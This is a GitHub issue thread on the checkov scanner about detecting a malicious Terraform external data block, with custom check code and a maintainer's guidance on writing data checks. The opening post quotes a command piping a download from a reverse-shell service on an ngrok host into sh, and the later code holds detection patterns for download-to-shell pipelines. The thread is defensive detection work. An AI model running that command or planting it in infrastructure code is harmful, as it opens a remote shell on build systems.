bridgecrewio / checkov

Prevent cloud misconfigurations and find vulnerabilities during build-time in infrastructure as code, container images and open source packages with Checkov by Bridgecrew.
https://www.checkov.io/
Apache License 2.0

Unable to find possible reverse shell #5727

Closed GoliTech closed 11 months ago

GoliTech commented 11 months ago

Describe the issue: if there is a malicious code block inside the configuration, checkov could not find it.

Examples:

```hcl
data "external" "example" {
  program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```

Version (please complete the following information):

Additional context: I even created a check, but it did not work:

```python
from checkov.common.models.enums import CheckResult, CheckCategories
from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck
from enum import Enum


# Note: this local enum shadows the CheckCategories imported above.
class CheckCategories(Enum):
    SECURITY = "SECURITY"


class CustomCheck(BaseResourceCheck):
    def __init__(self):
        name = "Detect potential reverse shell in external data"
        id = "CUSTOM_REVERSE_SHELL_CHECK"
        supported_resources = ["data"]
        categories = [CheckCategories.SECURITY]
        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)

    def scan_resource_conf(self, conf, entity_type):
        # Looks for a "program" attribute that runs curl and pipes into sh.
        if "external" in conf and "example" in conf["external"]:
            program = conf["external"]["example"].get("program")
            if program and any("sh" in part for part in program) and "curl" in program and "| sh" in " ".join(program):
                return CheckResult.FAILED, "Potential reverse shell detected in external data"
        return CheckResult.PASSED, ""


check_id = CustomCheck()
```

gruebel commented 11 months ago

hey @GoliTech thanks for reaching out.

I'm not sure what exactly the question is: are you looking for a built-in check which would find the issue, or do you want to create a custom check for it? In general we had a check which looked for any external use, but it was too noisy and therefore we removed it again. You should always be aware of anything running in an external data block, because it can exfiltrate secrets, run malicious code, etc.

GoliTech commented 11 months ago

@gruebel thanks for the quick response. That is true, I am looking for a check to raise a flag for external, but there is no built-in one and I tried to implement it myself; however, after 2 days I still could not implement it. Could you please help me? I even changed the scan function to:

```python
from checkov.common.models.enums import CheckResult, CheckCategories
from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck


class CustomCheck(BaseResourceCheck):
    def __init__(self):
        name = "Detect potential reverse shell in external data"
        id = "CUSTOM_REVERSE_SHELL_CHECK"
        supported_resources = ['azurerm_managed_disk']
        categories = [CheckCategories.NETWORKING]
        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)

    def scan_resource_conf(self, conf):
        # Always-true condition, used only to see whether the check runs at all.
        if 1 == 1:
            return CheckResult.FAILED, "Test condition 1 == 1 satisfied."
        else:
            return CheckResult.PASSED, ""
```

just to see if the scanner works or not. It looks like checkov does not find this 1==1 condition.

gruebel commented 11 months ago

Gotcha, you made a small mistake: data checks need to use a different parent class. Here is an example: https://github.com/bridgecrewio/checkov/blob/main/tests/terraform/checks/data/external/external_check/ExternalData.py. Depending on how complex your check is, you could also write it as a YAML-based one, like here: https://github.com/bridgecrewio/checkov/blob/main/tests/terraform/checks/data/external/external_check/ExternalData.py
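
A custom data check of the kind described in the reply above, written here as an added example; it is not checkov's own code and not the linked ExternalData.py test. It assumes the current BaseDataCheck interface (the constructor takes supported_data, the hook is scan_data_conf(conf, entity_type), and checkov wraps each HCL attribute value in a one-element list, so the program list arrives as conf["program"][0]), and that instantiating the check at module level (conventionally as check) registers it with the data-check registry when the module is loaded from --external-checks-dir. The check id, the sample configurations and the example.invalid URLs are constructed placeholders. The matching logic lives in plain functions so it can be exercised without checkov installed; the check class is only defined when checkov is importable.

```python
"""Custom checkov data check: flag `external` data sources whose program
downloads content and pipes it straight into a shell.

Added example, not checkov's own code. Assumptions are marked in comments.
"""
from __future__ import annotations

import re
from typing import Any

# Matches "| sh", "|bash", "| sudo bash" and similar at the end of a pipeline stage.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|dash|zsh|ksh)\b")
# Tools commonly used to fetch the content that gets piped.
DOWNLOADERS = ("curl", "wget", "fetch")


def program_from_conf(conf: dict[str, Any]) -> list[str]:
    """Extract the `program` list from the conf dict checkov hands to a check.

    Assumption: checkov wraps every HCL attribute value in a one-element list,
    so `program = ["sh", "-c", "..."]` arrives as {"program": [["sh", "-c", "..."]]}.
    A bare list is accepted too so the function also works on hand-built input.
    """
    program = conf.get("program")
    if isinstance(program, list) and len(program) == 1 and isinstance(program[0], list):
        program = program[0]
    if not isinstance(program, list):
        return []
    return [str(part) for part in program]


def find_pipe_to_shell(program: list[str]) -> str | None:
    """Return the first program argument that both downloads something and pipes
    it into a shell, or None when no argument matches."""
    for arg in program:
        if any(tool in arg for tool in DOWNLOADERS) and PIPE_TO_SHELL.search(arg):
            return arg
    return None


def evaluate(conf: dict[str, Any]) -> tuple[str, str | None]:
    """checkov-free view of the verdict: ("FAILED", offending_arg) or ("PASSED", None)."""
    offending = find_pipe_to_shell(program_from_conf(conf))
    return ("FAILED", offending) if offending else ("PASSED", None)


try:
    from checkov.common.models.enums import CheckCategories, CheckResult
    from checkov.terraform.checks.data.base_check import BaseDataCheck
except ImportError:  # checkov not installed: the functions above still work
    BaseDataCheck = None  # type: ignore[assignment,misc]

if BaseDataCheck is not None:

    class ExternalProgramPipesToShell(BaseDataCheck):
        def __init__(self) -> None:
            name = "Ensure external data source programs do not pipe downloaded content into a shell"
            id = "CKV_CUSTOM_EXTERNAL_PIPE_TO_SHELL"  # placeholder id, not a real checkov id
            supported_data = ("external",)  # the data source type, not the block keyword "data"
            categories = (CheckCategories.GENERAL_SECURITY,)
            super().__init__(name=name, id=id, categories=categories, supported_data=supported_data)

        # Assumption: this is the current BaseDataCheck hook signature.
        def scan_data_conf(self, conf: dict[str, list[Any]], entity_type: str) -> CheckResult:
            self.evaluated_keys = ["program"]
            verdict, _ = evaluate(conf)
            return CheckResult.FAILED if verdict == "FAILED" else CheckResult.PASSED

    # Instantiating the check registers it with checkov's data-check registry.
    check = ExternalProgramPipesToShell()


# Constructed sample confs in checkov's wrapped shape (not taken from any real project).
SAMPLE_CONFS = {
    "pipe_to_shell": {"program": [["sh", "-c", "curl https://example.invalid/setup.sh | sh"]]},
    "sudo_bash": {"program": [["bash", "-c", "wget -qO- https://example.invalid/i.sh | sudo bash"]]},
    "plain_download": {"program": [["sh", "-c", "curl -s https://example.invalid/data.json"]]},
    "python_script": {"program": [["python3", "./lookup.py"]]},
}

if __name__ == "__main__":
    for label, conf in SAMPLE_CONFS.items():
        print(label, evaluate(conf))
```

Drop the file into a directory and point checkov at it with --external-checks-dir; the conf passed to scan_data_conf is the body of the single data block being scanned, which is why the earlier attempt's lookup of conf["external"]["example"] never matched. The pattern is deliberately narrow (a downloader plus a pipe into a shell); if you want the noisier "any external data source" behaviour that was removed from the built-in checks, return FAILED unconditionally as the linked ExternalData.py test does.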

GoliTech commented 11 months ago

thanks a lot for your help.